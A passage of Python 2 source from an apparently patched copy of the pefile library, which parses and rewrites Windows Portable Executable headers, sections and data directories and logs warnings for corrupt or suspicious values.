'H,e_crlc', 'H,e_cparhdr', 'H,e_minalloc',
'H,e_maxalloc', 'H,e_ss', 'H,e_sp', 'H,e_csum',
'H,e_ip', 'H,e_cs', 'H,e_lfarlc', 'H,e_ovno', '8s,e_res',
'H,e_oemid', 'H,e_oeminfo', '20s,e_res2',
'I,e_lfanew'))
__IMAGE_FILE_HEADER_format__ = ('IMAGE_FILE_HEADER',
('H,Machine', 'H,NumberOfSections',
'I,TimeDateStamp', 'I,PointerToSymbolTable',
'I,NumberOfSymbols', 'H,SizeOfOptionalHeader',
'H,Characteristics'))
__IMAGE_DATA_DIRECTORY_format__ = ('IMAGE_DATA_DIRECTORY',
('I,VirtualAddress', 'I,Size'))
__IMAGE_OPTIONAL_HEADER_format__ = ('IMAGE_OPTIONAL_HEADER',
('H,Magic', 'B,MajorLinkerVersion',
'B,MinorLinkerVersion', 'I,SizeOfCode',
'I,SizeOfInitializedData', 'I,SizeOfUninitializedData',
'I,AddressOfEntryPoint', 'I,BaseOfCode', 'I,BaseOfData',
'I,ImageBase', 'I,SectionAlignment', 'I,FileAlignment',
'H,MajorOperatingSystemVersion', 'H,MinorOperatingSystemVersion',
'H,MajorImageVersion', 'H,MinorImageVersion',
'H,MajorSubsystemVersion', 'H,MinorSubsystemVersion',
'I,Reserved1', 'I,SizeOfImage', 'I,SizeOfHeaders',
'I,CheckSum', 'H,Subsystem', 'H,DllCharacteristics',
'I,SizeOfStackReserve', 'I,SizeOfStackCommit',
'I,SizeOfHeapReserve', 'I,SizeOfHeapCommit',
'I,LoaderFlags', 'I,NumberOfRvaAndSizes' ))
__IMAGE_OPTIONAL_HEADER64_format__ = ('IMAGE_OPTIONAL_HEADER64',
('H,Magic', 'B,MajorLinkerVersion',
'B,MinorLinkerVersion', 'I,SizeOfCode',
'I,SizeOfInitializedData', 'I,SizeOfUninitializedData',
'I,AddressOfEntryPoint', 'I,BaseOfCode',
'Q,ImageBase', 'I,SectionAlignment', 'I,FileAlignment',
'H,MajorOperatingSystemVersion', 'H,MinorOperatingSystemVersion',
'H,MajorImageVersion', 'H,MinorImageVersion',
'H,MajorSubsystemVersion', 'H,MinorSubsystemVersion',
'I,Reserved1', 'I,SizeOfImage', 'I,SizeOfHeaders',
'I,CheckSum', 'H,Subsystem', 'H,DllCharacteristics',
'Q,SizeOfStackReserve', 'Q,SizeOfStackCommit',
'Q,SizeOfHeapReserve', 'Q,SizeOfHeapCommit',
'I,LoaderFlags', 'I,NumberOfRvaAndSizes' ))
__IMAGE_NT_HEADERS_format__ = ('IMAGE_NT_HEADERS', ('I,Signature',))
__IMAGE_SECTION_HEADER_format__ = ('IMAGE_SECTION_HEADER',
('8s,Name', 'I,Misc,Misc_PhysicalAddress,Misc_VirtualSize',
'I,VirtualAddress', 'I,SizeOfRawData', 'I,PointerToRawData',
'I,PointerToRelocations', 'I,PointerToLinenumbers',
'H,NumberOfRelocations', 'H,NumberOfLinenumbers',
'I,Characteristics'))
__IMAGE_DELAY_IMPORT_DESCRIPTOR_format__ = ('IMAGE_DELAY_IMPORT_DESCRIPTOR',
('I,grAttrs', 'I,szName', 'I,phmod', 'I,pIAT', 'I,pINT',
'I,pBoundIAT', 'I,pUnloadIAT', 'I,dwTimeStamp'))
__IMAGE_IMPORT_DESCRIPTOR_format__ = ('IMAGE_IMPORT_DESCRIPTOR',
('I,OriginalFirstThunk,Characteristics',
'I,TimeDateStamp', 'I,ForwarderChain', 'I,Name', 'I,FirstThunk'))
__IMAGE_EXPORT_DIRECTORY_format__ = ('IMAGE_EXPORT_DIRECTORY',
('I,Characteristics',
'I,TimeDateStamp', 'H,MajorVersion', 'H,MinorVersion', 'I,Name',
'I,Base', 'I,NumberOfFunctions', 'I,NumberOfNames',
'I,AddressOfFunctions', 'I,AddressOfNames', 'I,AddressOfNameOrdinals'))
__IMAGE_RESOURCE_DIRECTORY_format__ = ('IMAGE_RESOURCE_DIRECTORY',
('I,Characteristics',
'I,TimeDateStamp', 'H,MajorVersion', 'H,MinorVersion',
'H,NumberOfNamedEntries', 'H,NumberOfIdEntries'))
__IMAGE_RESOURCE_DIRECTORY_ENTRY_format__ = ('IMAGE_RESOURCE_DIRECTORY_ENTRY',
('I,Name',
'I,OffsetToData'))
__IMAGE_RESOURCE_DATA_ENTRY_format__ = ('IMAGE_RESOURCE_DATA_ENTRY',
('I,OffsetToData', 'I,Size', 'I,CodePage', 'I,Reserved'))
__VS_VERSIONINFO_format__ = ( 'VS_VERSIONINFO',
('H,Length', 'H,ValueLength', 'H,Type' ))
__VS_FIXEDFILEINFO_format__ = ( 'VS_FIXEDFILEINFO',
('I,Signature', 'I,StrucVersion', 'I,FileVersionMS', 'I,FileVersionLS',
'I,ProductVersionMS', 'I,ProductVersionLS', 'I,FileFlagsMask', 'I,FileFlags',
'I,FileOS', 'I,FileType', 'I,FileSubtype', 'I,FileDateMS', 'I,FileDateLS'))
__StringFileInfo_format__ = ( 'StringFileInfo',
('H,Length', 'H,ValueLength', 'H,Type' ))
__StringTable_format__ = ( 'StringTable',
('H,Length', 'H,ValueLength', 'H,Type' ))
__String_format__ = ( 'String',
('H,Length', 'H,ValueLength', 'H,Type' ))
__Var_format__ = ( 'Var', ('H,Length', 'H,ValueLength', 'H,Type' ))
__IMAGE_THUNK_DATA_format__ = ('IMAGE_THUNK_DATA',
('I,ForwarderString,Function,Ordinal,AddressOfData',))
__IMAGE_THUNK_DATA64_format__ = ('IMAGE_THUNK_DATA',
('Q,ForwarderString,Function,Ordinal,AddressOfData',))
__IMAGE_DEBUG_DIRECTORY_format__ = ('IMAGE_DEBUG_DIRECTORY',
('I,Characteristics', 'I,TimeDateStamp', 'H,MajorVersion',
'H,MinorVersion', 'I,Type', 'I,SizeOfData', 'I,AddressOfRawData',
'I,PointerToRawData'))
__IMAGE_BASE_RELOCATION_format__ = ('IMAGE_BASE_RELOCATION',
('I,VirtualAddress', 'I,SizeOfBlock') )
__IMAGE_BASE_RELOCATION_ENTRY_format__ = ('IMAGE_BASE_RELOCATION_ENTRY',
('H,Data',) )
__IMAGE_TLS_DIRECTORY_format__ = ('IMAGE_TLS_DIRECTORY',
('I,StartAddressOfRawData', 'I,EndAddressOfRawData',
'I,AddressOfIndex', 'I,AddressOfCallBacks',
'I,SizeOfZeroFill', 'I,Characteristics' ) )
__IMAGE_TLS_DIRECTORY64_format__ = ('IMAGE_TLS_DIRECTORY',
('Q,StartAddressOfRawData', 'Q,EndAddressOfRawData',
'Q,AddressOfIndex', 'Q,AddressOfCallBacks',
'I,SizeOfZeroFill', 'I,Characteristics' ) )
__IMAGE_LOAD_CONFIG_DIRECTORY_format__ = ('IMAGE_LOAD_CONFIG_DIRECTORY',
('I,Size',
'I,TimeDateStamp',
'H,MajorVersion',
'H,MinorVersion',
'I,GlobalFlagsClear',
'I,GlobalFlagsSet',
'I,CriticalSectionDefaultTimeout',
'I,DeCommitFreeBlockThreshold',
'I,DeCommitTotalFreeThreshold',
'I,LockPrefixTable',
'I,MaximumAllocationSize',
'I,VirtualMemoryThreshold',
'I,ProcessHeapFlags',
'I,ProcessAffinityMask',
'H,CSDVersion',
'H,Reserved1',
'I,EditList',
'I,SecurityCookie',
'I,SEHandlerTable',
'I,SEHandlerCount',
'I,GuardCFCheckFunctionPointer',
'I,Reserved2',
'I,GuardCFFunctionTable',
'I,GuardCFFunctionCount',
'I,GuardFlags' ) )
__IMAGE_LOAD_CONFIG_DIRECTORY64_format__ = ('IMAGE_LOAD_CONFIG_DIRECTORY',
('I,Size',
'I,TimeDateStamp',
'H,MajorVersion',
'H,MinorVersion',
'I,GlobalFlagsClear',
'I,GlobalFlagsSet',
'I,CriticalSectionDefaultTimeout',
'Q,DeCommitFreeBlockThreshold',
'Q,DeCommitTotalFreeThreshold',
'Q,LockPrefixTable',
'Q,MaximumAllocationSize',
'Q,VirtualMemoryThreshold',
'Q,ProcessAffinityMask',
'I,ProcessHeapFlags',
'H,CSDVersion',
'H,Reserved1',
'Q,EditList',
'Q,SecurityCookie',
'Q,SEHandlerTable',
'Q,SEHandlerCount',
'Q,GuardCFCheckFunctionPointer',
'Q,Reserved2',
'Q,GuardCFFunctionTable',
'Q,GuardCFFunctionCount',
'I,GuardFlags' ) )
__IMAGE_BOUND_IMPORT_DESCRIPTOR_format__ = ('IMAGE_BOUND_IMPORT_DESCRIPTOR',
('I,TimeDateStamp', 'H,OffsetModuleName', 'H,NumberOfModuleForwarderRefs'))
__IMAGE_BOUND_FORWARDER_REF_format__ = ('IMAGE_BOUND_FORWARDER_REF',
('I,TimeDateStamp', 'H,OffsetModuleName', 'H,Reserved') )
def __init__(self, name=None, data=None, fast_load=None):
self.sections = []
self.__warnings = []
self.PE_TYPE = None
if not name and not data:
return
# This list will keep track of all the structures created.
# That will allow for an easy iteration through the list
# in order to save the modifications made
self.__structures__ = []
self.__from_file = None
if not fast_load:
fast_load = globals()['fast_load']
try:
self.__parse__(name, data, fast_load)
except:
self.close()
raise
def close(self):
if ( self.__from_file is True and hasattr(self, '__data__') and
((isinstance(mmap.mmap, type) and isinstance(self.__data__, mmap.mmap)) or
'mmap.mmap' in repr(type(self.__data__))) ):
self.__data__.close()
def __unpack_data__(self, format, data, file_offset):
"""Apply structure format to raw data.
Returns and unpacked structure object if successful, None otherwise.
"""
structure = Structure(format, file_offset=file_offset)
try:
structure.__unpack__(data)
except PEFormatError, err:
self.__warnings.append(
'Corrupt header "%s" at file offset %d. Exception: %s' % (
format[0], file_offset, str(err)) )
return None
self.__structures__.append(structure)
return structure
def __parse__(self, fname, data, fast_load):
"""Parse a Portable Executable file.
Loads a PE file, parsing all its structures and making them available
through the instance's attributes.
"""
if fname:
stat = os.stat(fname)
if stat.st_size == 0:
raise PEFormatError('The file is empty')
fd = None
try:
fd = file(fname, 'rb')
self.fileno = fd.fileno()
if hasattr(mmap, 'MAP_PRIVATE'):
# Unix
self.__data__ = mmap.mmap(self.fileno, 0, mmap.MAP_PRIVATE)
else:
# Windows
self.__data__ = mmap.mmap(self.fileno, 0, access=mmap.ACCESS_READ)
self.__from_file = True
except IOError, excp:
exception_msg = str(excp)
if exception_msg:
exception_msg = ': %s' % exception_msg
raise Exception('Unable to access file \'%s\'%s' % (fname, exception_msg))
finally:
if fd is not None:
fd.close()
elif data:
self.__data__ = data
self.__from_file = False
dos_header_data = self.__data__[:64]
if len(dos_header_data) != 64:
raise PEFormatError('Unable to read the DOS Header, possibly a truncated file.')
self.DOS_HEADER = self.__unpack_data__(
self.__IMAGE_DOS_HEADER_format__,
dos_header_data, file_offset=0)
if self.DOS_HEADER.e_magic == IMAGE_DOSZM_SIGNATURE:
raise PEFormatError('Probably a ZM Executable (not a PE file).')
if not self.DOS_HEADER or self.DOS_HEADER.e_magic != IMAGE_DOS_SIGNATURE:
raise PEFormatError('DOS Header magic not found.')
# OC Patch:
# Check for sane value in e_lfanew
#
if self.DOS_HEADER.e_lfanew > len(self.__data__):
raise PEFormatError('Invalid e_lfanew value, probably not a PE file')
nt_headers_offset = self.DOS_HEADER.e_lfanew
self.NT_HEADERS = self.__unpack_data__(
self.__IMAGE_NT_HEADERS_format__,
self.__data__[nt_headers_offset:nt_headers_offset+8],
file_offset = nt_headers_offset)
# We better check the signature right here, before the file screws
# around with sections:
# OC Patch:
# Some malware will cause the Signature value to not exist at all
if not self.NT_HEADERS or not self.NT_HEADERS.Signature:
raise PEFormatError('NT Headers not found.')
if (0xFFFF & self.NT_HEADERS.Signature) == IMAGE_NE_SIGNATURE:
raise PEFormatError('Invalid NT Headers signature. Probably a NE file')
if (0xFFFF & self.NT_HEADERS.Signature) == IMAGE_LE_SIGNATURE:
raise PEFormatError('Invalid NT Headers signature. Probably a LE file')
if (0xFFFF & self.NT_HEADERS.Signature) == IMAGE_LX_SIGNATURE:
raise PEFormatError('Invalid NT Headers signature. Probably a LX file')
if (0xFFFF & self.NT_HEADERS.Signature) == IMAGE_TE_SIGNATURE:
raise PEFormatError('Invalid NT Headers signature. Probably a TE file')
if self.NT_HEADERS.Signature != IMAGE_NT_SIGNATURE:
raise PEFormatError('Invalid NT Headers signature.')
self.FILE_HEADER = self.__unpack_data__(
self.__IMAGE_FILE_HEADER_format__,
self.__data__[nt_headers_offset+4:nt_headers_offset+4+32],
file_offset = nt_headers_offset+4)
image_flags = retrieve_flags(IMAGE_CHARACTERISTICS, 'IMAGE_FILE_')
if not self.FILE_HEADER:
raise PEFormatError('File Header missing')
# Set the image's flags according the the Characteristics member
set_flags(self.FILE_HEADER, self.FILE_HEADER.Characteristics, image_flags)
optional_header_offset = \
nt_headers_offset+4+self.FILE_HEADER.sizeof()
# Note: location of sections can be controlled from PE header:
sections_offset = optional_header_offset + self.FILE_HEADER.SizeOfOptionalHeader
self.OPTIONAL_HEADER = self.__unpack_data__(
self.__IMAGE_OPTIONAL_HEADER_format__,
# Read up to 256 bytes to allow creating a copy of too much data
self.__data__[optional_header_offset:optional_header_offset+256],
file_offset = optional_header_offset)
# According to solardesigner's findings for his
# Tiny PE project, the optional header does not
# need fields beyond "Subsystem" in order to be
# loadable by the Windows loader (given that zeros
# are acceptable values and the header is loaded
# in a zeroed memory page)
# If trying to parse a full Optional Header fails
# we try to parse it again with some 0 padding
#
MINIMUM_VALID_OPTIONAL_HEADER_RAW_SIZE = 69
if ( self.OPTIONAL_HEADER is None and
len(self.__data__[optional_header_offset:optional_header_offset+0x200])
>= MINIMUM_VALID_OPTIONAL_HEADER_RAW_SIZE ):
# Add enough zeros to make up for the unused fields
#
padding_length = 128
# Create padding
#
padded_data = self.__data__[optional_header_offset:optional_header_offset+0x200] + (
'\0' * padding_length)
self.OPTIONAL_HEADER = self.__unpack_data__(
self.__IMAGE_OPTIONAL_HEADER_format__,
padded_data,
file_offset = optional_header_offset)
# Check the Magic in the OPTIONAL_HEADER and set the PE file
# type accordingly
#
if self.OPTIONAL_HEADER is not None:
if self.OPTIONAL_HEADER.Magic == OPTIONAL_HEADER_MAGIC_PE:
self.PE_TYPE = OPTIONAL_HEADER_MAGIC_PE
elif self.OPTIONAL_HEADER.Magic == OPTIONAL_HEADER_MAGIC_PE_PLUS:
self.PE_TYPE = OPTIONAL_HEADER_MAGIC_PE_PLUS
self.OPTIONAL_HEADER = self.__unpack_data__(
self.__IMAGE_OPTIONAL_HEADER64_format__,
self.__data__[optional_header_offset:optional_header_offset+0x200],
file_offset = optional_header_offset)
# Again, as explained above, we try to parse
# a reduced form of the Optional Header which
# is still valid despite not including all
# structure members
#
MINIMUM_VALID_OPTIONAL_HEADER_RAW_SIZE = 69+4
if ( self.OPTIONAL_HEADER is None and
len(self.__data__[optional_header_offset:optional_header_offset+0x200])
>= MINIMUM_VALID_OPTIONAL_HEADER_RAW_SIZE ):
padding_length = 128
padded_data = self.__data__[optional_header_offset:optional_header_offset+0x200] + (
'\0' * padding_length)
self.OPTIONAL_HEADER = self.__unpack_data__(
self.__IMAGE_OPTIONAL_HEADER64_format__,
padded_data,
file_offset = optional_header_offset)
if not self.FILE_HEADER:
raise PEFormatError('File Header missing')
# OC Patch:
# Die gracefully if there is no OPTIONAL_HEADER field
# 975440f5ad5e2e4a92c4d9a5f22f75c1
if self.PE_TYPE is None or self.OPTIONAL_HEADER is None:
raise PEFormatError("No Optional Header found, invalid PE32 or PE32+ file")
dll_characteristics_flags = retrieve_flags(DLL_CHARACTERISTICS, 'IMAGE_DLLCHARACTERISTICS_')
# Set the Dll Characteristics flags according the the DllCharacteristics member
set_flags(
self.OPTIONAL_HEADER,
self.OPTIONAL_HEADER.DllCharacteristics,
dll_characteristics_flags)
self.OPTIONAL_HEADER.DATA_DIRECTORY = []
#offset = (optional_header_offset + self.FILE_HEADER.SizeOfOptionalHeader)
offset = (optional_header_offset + self.OPTIONAL_HEADER.sizeof())
self.NT_HEADERS.FILE_HEADER = self.FILE_HEADER
self.NT_HEADERS.OPTIONAL_HEADER = self.OPTIONAL_HEADER
# Windows 8 specific check
#
if self.OPTIONAL_HEADER.AddressOfEntryPoint < self.OPTIONAL_HEADER.SizeOfHeaders:
self.__warnings.append(
'SizeOfHeaders is smaller than AddressOfEntryPoint: this file cannot run under Windows 8' )
# The NumberOfRvaAndSizes is sanitized to stay within
# reasonable limits so can be casted to an int
#
if self.OPTIONAL_HEADER.NumberOfRvaAndSizes > 0x10:
self.__warnings.append(
'Suspicious NumberOfRvaAndSizes in the Optional Header. ' +
'Normal values are never larger than 0x10, the value is: 0x%x' %
self.OPTIONAL_HEADER.NumberOfRvaAndSizes )
MAX_ASSUMED_VALID_NUMBER_OF_RVA_AND_SIZES = 0x100
for i in xrange(int(0x7fffffffL & self.OPTIONAL_HEADER.NumberOfRvaAndSizes)):
if len(self.__data__) - offset == 0:
break
if len(self.__data__) - offset < 8:
data = self.__data__[offset:] + '\0'*8
else:
data = self.__data__[offset:offset+MAX_ASSUMED_VALID_NUMBER_OF_RVA_AND_SIZES]
dir_entry = self.__unpack_data__(
self.__IMAGE_DATA_DIRECTORY_format__,
data,
file_offset = offset)
if dir_entry is None:
break
# Would fail if missing an entry
# 1d4937b2fa4d84ad1bce0309857e70ca offending sample
try:
dir_entry.name = DIRECTORY_ENTRY[i]
except (KeyError, AttributeError):
break
offset += dir_entry.sizeof()
self.OPTIONAL_HEADER.DATA_DIRECTORY.append(dir_entry)
# If the offset goes outside the optional header,
# the loop is broken, regardless of how many directories
# NumberOfRvaAndSizes says there are
#
# We assume a normally sized optional header, hence that we do
# a sizeof() instead of reading SizeOfOptionalHeader.
# Then we add a default number of directories times their size,
# if we go beyond that, we assume the number of directories
# is wrong and stop processing
if offset >= (optional_header_offset +
self.OPTIONAL_HEADER.sizeof() + 8*16) :
break
offset = self.parse_sections(sections_offset)
# OC Patch:
# There could be a problem if there are no raw data sections
# greater than 0
# fc91013eb72529da005110a3403541b6 example
# Should this throw an exception in the minimum header offset
# can't be found?
#
rawDataPointers = [
self.adjust_FileAlignment( s.PointerToRawData,
self.OPTIONAL_HEADER.FileAlignment )
for s in self.sections if s.PointerToRawData>0 ]
if len(rawDataPointers) > 0:
lowest_section_offset = min(rawDataPointers)
else:
lowest_section_offset = None
if not lowest_section_offset or lowest_section_offset < offset:
self.header = self.__data__[:offset]
else:
self.header = self.__data__[:lowest_section_offset]
# Check whether the entry point lies within a section
#
if self.get_section_by_rva(self.OPTIONAL_HEADER.AddressOfEntryPoint) is not None:
# Check whether the entry point lies within the file
#
ep_offset = self.get_offset_from_rva(self.OPTIONAL_HEADER.AddressOfEntryPoint)
if ep_offset > len(self.__data__):
self.__warnings.append(
'Possibly corrupt file. AddressOfEntryPoint lies outside the file. ' +
'AddressOfEntryPoint: 0x%x' %
self.OPTIONAL_HEADER.AddressOfEntryPoint )
else:
self.__warnings.append(
'AddressOfEntryPoint lies outside the sections\' boundaries. ' +
'AddressOfEntryPoint: 0x%x' %
self.OPTIONAL_HEADER.AddressOfEntryPoint )
if not fast_load:
self.parse_data_directories()
class RichHeader:
pass
rich_header = self.parse_rich_header()
if rich_header:
self.RICH_HEADER = RichHeader()
self.RICH_HEADER.checksum = rich_header.get('checksum', None)
self.RICH_HEADER.values = rich_header.get('values', None)
else:
self.RICH_HEADER = None
def parse_rich_header(self):
"""Parses the rich header
see http://www.ntcore.com/files/richsign.htm for more information
Structure:
00 DanS ^ checksum, checksum, checksum, checksum
10 Symbol RVA ^ checksum, Symbol size ^ checksum...
...
XX Rich, checksum, 0, 0,...
"""
# Rich Header constants
#
DANS = 0x536E6144 # 'DanS' as dword
RICH = 0x68636952 # 'Rich' as dword
# Read a block of data
try:
rich_data = self.get_data(0x80, 0x80)
if len(rich_data) != 0x80:
return None
data = list(struct.unpack("<32I", rich_data))
except PEFormatError:
return None
# the checksum should be present 3 times after the DanS signature
#
checksum = data[1]
if (data[0] ^ checksum != DANS
or data[2] != checksum
or data[3] != checksum):
return None
result = {"checksum": checksum}
headervalues = []
result ["values"] = headervalues
data = data[4:]
for i in xrange(len(data) / 2):
# Stop until the Rich footer signature is found
#
if data[2 * i] == RICH:
# it should be followed by the checksum
#
if data[2 * i + 1] != checksum:
self.__warnings.append('Rich Header corrupted')
break
# header values come by pairs
#
headervalues += [data[2 * i] ^ checksum, data[2 * i + 1] ^ checksum]
return result
def get_warnings(self):
"""Return the list of warnings.
Non-critical problems found when parsing the PE file are
appended to a list of warnings. This method returns the
full list.
"""
return self.__warnings
def show_warnings(self):
"""Print the list of warnings.
Non-critical problems found when parsing the PE file are
appended to a list of warnings. This method prints the
full list to standard output.
"""
for warning in self.__warnings:
print '>', warning
def full_load(self):
"""Process the data directories.
This method will load the data directories which might not have
been loaded if the "fast_load" option was used.
"""
self.parse_data_directories()
def write(self, filename=None):
"""Write the PE file.
This function will process all headers and components
of the PE file and include all changes made (by just
assigning to attributes in the PE objects) and write
the changes back to a file whose name is provided as
an argument. The filename is optional, if not
provided the data will be returned as a 'str' object.
"""
if is_bytearray_available():
# Making a list of a byte file is incredibly inefficient and will
# cause pefile to take far more RAM than it should. Use bytearrays
# instead.
file_data = bytearray(self.__data__)
else:
file_data = list(self.__data__)
for structure in self.__structures__:
if is_bytearray_available():
struct_data = bytearray(structure.__pack__())
else:
struct_data = list(structure.__pack__())
offset = structure.get_file_offset()
file_data[offset:offset+len(struct_data)] = struct_data
if hasattr(self, 'VS_VERSIONINFO'):
if hasattr(self, 'FileInfo'):
for entry in self.FileInfo:
if hasattr(entry, 'StringTable'):
for st_entry in entry.StringTable:
for key, entry in st_entry.entries.items():
offsets = st_entry.entries_offsets[key]
lengths = st_entry.entries_lengths[key]
if is_bytearray_available():
if len( entry ) > lengths[1]:
l = bytearray()
for idx, c in enumerate(entry):
if ord(c) > 256:
l.extend( [ ord(c) & 0xff, chr( (ord(c) & 0xff00) >> 8) ] )
else:
l.extend( [ ord(c), '\0' ] )
file_data[offsets[1]:offsets[1]+lengths[1]*2 ] = l
else:
l = bytearray()
for idx, c in enumerate(entry):
if ord(c) > 256:
l.extend( [ chr(ord(c) & 0xff), chr( (ord(c) & 0xff00) >>8) ] )
else:
l.extend( [ ord(c), '\0'] )
file_data[offsets[1]:offsets[1]+len(entry)*2 ] = l
remainder = lengths[1] - len(entry)
if remainder:
start = offsets[1] + len(entry)*2
end = offsets[1] + lengths[1]*2
file_data[start:end] = ['\0'] * remainder*2
else:
if len( entry ) > lengths[1]:
l = list()
for idx, c in enumerate(entry):
if ord(c) > 256:
l.extend( [ chr(ord(c) & 0xff), chr( (ord(c) & 0xff00) >>8) ] )
else:
l.extend( [chr( ord(c) ), '\0'] )
file_data[
offsets[1] : offsets[1] + lengths[1]*2 ] = l
else:
l = list()
for idx, c in enumerate(entry):
if ord(c) > 256:
l.extend( [chr(ord(c) & 0xff), chr( (ord(c) & 0xff00) >>8) ] )
else:
l.extend( [chr(ord(c)), '\0'] )
file_data[offsets[1]:offsets[1]+len(entry)*2] = l
remainder = lengths[1] - len(entry)
start = offsets[1] + len(entry)*2
end = offsets[1] + lengths[1]*2
file_data[start:end] = [u'\0'] * remainder*2
if is_bytearray_available():
new_file_data = ''.join( chr(c) for c in file_data )
else:
new_file_data = ''.join( [ chr(ord(c)) for c in file_data] )
if filename:
f = file(filename, 'wb+')
f.write(new_file_data)
f.close()
else:
return new_file_data
def parse_sections(self, offset):
"""Fetch the PE file sections.
The sections will be readily available in the "sections" attribute.
Its attributes will contain all the section information plus "data"
a buffer containing the section's data.
The "Characteristics" member will be processed and attributes
representing the section characteristics (with the 'IMAGE_SCN_'
string trimmed from the constant's names) will be added to the
section instance.
Refer to the SectionStructure class for additional info.
"""
self.sections = []
MAX_SIMULTANEOUS_ERRORS = 3
for i in xrange(self.FILE_HEADER.NumberOfSections):
simultaneous_errors = 0
section = SectionStructure( self.__IMAGE_SECTION_HEADER_format__, pe=self )
if not section:
break
section_offset = offset + section.sizeof() * i
section.set_file_offset(section_offset)
section_data = self.__data__[section_offset : section_offset + section.sizeof()]
# Check if the section is all nulls and stop if so.
if section_data.count('\0') == section.sizeof():
self.__warnings.append(
('Invalid section %d. ' % i) +
'Contents are null-bytes.')
break
if len(section_data) == 0:
self.__warnings.append(
('Invalid section %d. ' % i) +
'No data in the file (is this corkami\'s virtsectblXP?).')
break
section.__unpack__(section_data)
self.__structures__.append(section)
if section.SizeOfRawData+section.PointerToRawData > len(self.__data__):
simultaneous_errors += 1
self.__warnings.append(
('Error parsing section %d. ' % i) +
'SizeOfRawData is larger than file.')
if self.adjust_FileAlignment( section.PointerToRawData,
self.OPTIONAL_HEADER.FileAlignment ) > len(self.__data__):
simultaneous_errors += 1
self.__warnings.append(
('Error parsing section %d. ' % i) +
'PointerToRawData points beyond the end of the file.')
if section.Misc_VirtualSize > 0x10000000:
simultaneous_errors += 1
self.__warnings.append(
('Suspicious value found parsing section %d. ' % i) +
'VirtualSize is extremely large > 256MiB.')
if self.adjust_SectionAlignment( section.VirtualAddress,
self.OPTIONAL_HEADER.SectionAlignment, self.OPTIONAL_HEADER.FileAlignment ) > 0x10000000:
simultaneous_errors += 1
self.__warnings.append(
('Suspicious value found parsing section %d. ' % i) +
'VirtualAddress is beyond 0x10000000.')
if ( self.OPTIONAL_HEADER.FileAlignment != 0 and
( section.PointerToRawData % self.OPTIONAL_HEADER.FileAlignment) != 0):
simultaneous_errors += 1
self.__warnings.append(
('Error parsing section %d. ' % i) +
'PointerToRawData should normally be ' +
'a multiple of FileAlignment, this might imply the file ' +
'is trying to confuse tools which parse this incorrectly.')
if simultaneous_errors >= MAX_SIMULTANEOUS_ERRORS:
self.__warnings.append('Too many warnings parsing section. Aborting.')
break
section_flags = retrieve_flags(SECTION_CHARACTERISTICS, 'IMAGE_SCN_')
# Set the section's flags according the the Characteristics member
set_flags(section, section.Characteristics, section_flags)
if ( section.__dict__.get('IMAGE_SCN_MEM_WRITE', False) and
section.__dict__.get('IMAGE_SCN_MEM_EXECUTE', False) ):
if section.Name == 'PAGE' and self.is_driver():
# Drivers can have a PAGE section with those flags set without
# implying that it is malicious
pass
else:
self.__warnings.append(
('Suspicious flags set for section %d. ' % i) +
'Both IMAGE_SCN_MEM_WRITE and IMAGE_SCN_MEM_EXECUTE are set. ' +
'This might indicate a packed executable.')
self.sections.append(section)
# Sort the sections by their VirtualAddress and add a field to each of them
# with the VirtualAddress of the next section. This will allow to check
# for potentially overlapping sections in badly constructed PEs.
self.sections.sort(cmp=lambda a,b: cmp(a.VirtualAddress, b.VirtualAddress))
for idx, section in enumerate(self.sections):
if idx == len(self.sections)-1:
section.next_section_virtual_address = None
else:
section.next_section_virtual_address = self.sections[idx+1].VirtualAddress
if self.FILE_HEADER.NumberOfSections > 0 and self.sections:
return offset + self.sections[0].sizeof()*self.FILE_HEADER.NumberOfSections
else:
return offset
def parse_data_directories(self, directories=None):
"""Parse and process the PE file's data directories.
If the optional argument 'directories' is given, only
the directories at the specified indexes will be parsed.
Such functionality allows parsing of areas of interest
without the burden of having to parse all others.
The directories can then be specified as:
For export / import only:
directories = [ 0, 1 ]
or (more verbosely):
directories = [ DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_IMPORT'],
DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_EXPORT'] ]
If 'directories' is a list, the ones that are processed will be removed,
leaving only the ones that are not present in the image.
"""
directory_parsing = (
('IMAGE_DIRECTORY_ENTRY_IMPORT', self.parse_import_directory),
('IMAGE_DIRECTORY_ENTRY_EXPORT', self.parse_export_directory),
('IMAGE_DIRECTORY_ENTRY_RESOURCE', self.parse_resources_directory),
('IMAGE_DIRECTORY_ENTRY_DEBUG', self.parse_debug_directory),
('IMAGE_DIRECTORY_ENTRY_BASERELOC', self.parse_relocations_directory),
('IMAGE_DIRECTORY_ENTRY_TLS', self.parse_directory_tls),
('IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG', self.parse_directory_load_config),
('IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT', self.parse_delay_import_directory),
('IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT', self.parse_directory_bound_imports) )
if directories is not None:
if not isinstance(directories, (tuple, list)):
directories = [directories]
for entry in directory_parsing:
# OC Patch:
#
try:
directory_index = DIRECTORY_ENTRY[entry[0]]
dir_entry = self.OPTIONAL_HEADER.DATA_DIRECTORY[directory_index]
except IndexError:
break
# Only process all the directories if no individual ones have
# been chosen
#
if directories is None or directory_index in directories:
if dir_entry.VirtualAddress:
value = entry[1](dir_entry.VirtualAddress, dir_entry.Size)
if value:
setattr(self, entry[0][6:], value)
if (directories is not None) and isinstance(directories, list) and (entry[0] in directories):
directories.remove(directory_index)
def parse_directory_bound_imports(self, rva, size):
""""""
bnd_descr = Structure(self.__IMAGE_BOUND_IMPORT_DESCRIPTOR_format__)
bnd_descr_size = bnd_descr.sizeof()
start = rva
bound_imports = []
while True:
bnd_descr = self.__unpack_data__(
self.__IMAGE_BOUND_IMPORT_DESCRIPTOR_format__,
self.__data__[rva:rva+bnd_descr_size],
file_offset = rva)
if bnd_descr is None:
# If can't parse directory then silently return.
# This directory does not necessarily have to be valid to
# still have a valid PE file
self.__warnings.append(
'The Bound Imports directory exists but can\'t be parsed.')
return
if bnd_descr.all_zeroes():
break
rva += bnd_descr.sizeof()
section = self.get_section_by_offset(rva)
file_offset = self.get_offset_from_rva(rva)
if section is None:
safety_boundary = len(self.__data__) - file_offset
sections_after_offset = [section.PointerToRawData for section in self.sections
if section.PointerToRawData > file_offset]
if sections_after_offset:
# Find the first section starting at a later offset than that specified by 'rva'
first_section_after_offset = min(sections_after_offset)
section = self.get_section_by_offset(first_section_after_offset)
if section is not None:
safety_boundary = section.PointerToRawData - file_offset
else:
safety_boundary = section.PointerToRawData + len(section.get_data()) - file_offset
if not section:
self.__warnings.append(
